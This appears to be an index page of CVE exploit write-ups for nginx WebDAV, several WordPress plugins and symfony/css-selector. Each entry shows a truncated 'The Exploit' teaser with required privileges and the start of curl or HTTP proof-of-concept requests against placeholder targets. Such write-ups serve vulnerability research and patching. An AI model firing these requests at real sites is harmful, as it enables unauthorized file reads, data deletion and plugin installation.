Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...


CVE-2025-13935

## The Exploit Authenticated subscriber-level users can directly call Tutor LMS's course completion AJAX handler and mark any course complete. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-f...


CVE-2025-9318

## The Exploit Requires an authenticated Subscriber-level account or higher. ```bash curl -i -s -X POST 'https://TARGET_HOST/wp-json/qsm/v1/questions/123' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Cookie: wordpress_...


CVE-2025-14059

## The Exploit An authenticated attacker with Author-level privileges or higher can abuse `create_template` to read arbitrary files via the `emailkit-editor-template` REST parameter. ```bash curl -i -s -X POST 'https://<TARGET_HOST>/wp-js...


CVE-2025-9294

## The Exploit An authenticated user with Subscriber-level access or higher can delete QSM quiz results by POSTing a valid nonce and `result_id` to QSM’s AJAX delete endpoint. ```bash curl -i -X POST "https://example.com/wp-admin/admin-aj...


CVE-2025-13964

## The Exploit No authentication is required; an attacker only needs to control the CSS selector string passed into the affected `symfony/css-selector` parser. ```bash php -r 'require "vendor/autoload.php"; use Symfony\Component\CssSelect...


CVE-2025-9637

## The Exploit Attacker needs no authentication. ```bash curl -s -X POST 'https://TARGET/wp-admin/admin-ajax.php' \ -d 'action=qsm_get_quiz_to_reload&quiz_id=123' \ -H 'Content-Type: application/x-www-form-urlencoded' ``` The vulnera...


CVE-2025-14371

## The Exploit Authenticated attacker needs Contributor-level access or higher. ```http POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example.com Content-Type: application/x-www-form-urlencoded Cookie: wordpress_logged_in_XXXXXXXXXX...


CVE-2024-10542: CleanTalkwordpress-antispam

## The Exploit An unauthenticated attacker with network access and an IP whose reverse DNS resolves to a domain containing `cleantalk.org` can call the CleanTalk remote API and install plugins without a token. ```bash curl -i -X POST 'htt...


CVE-2024-10781: cleantalk-spam-protect

## The Exploit Attacker needs no valid CleanTalk API key or authenticated WordPress session. ```bash curl -i -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ --data-urlenc...
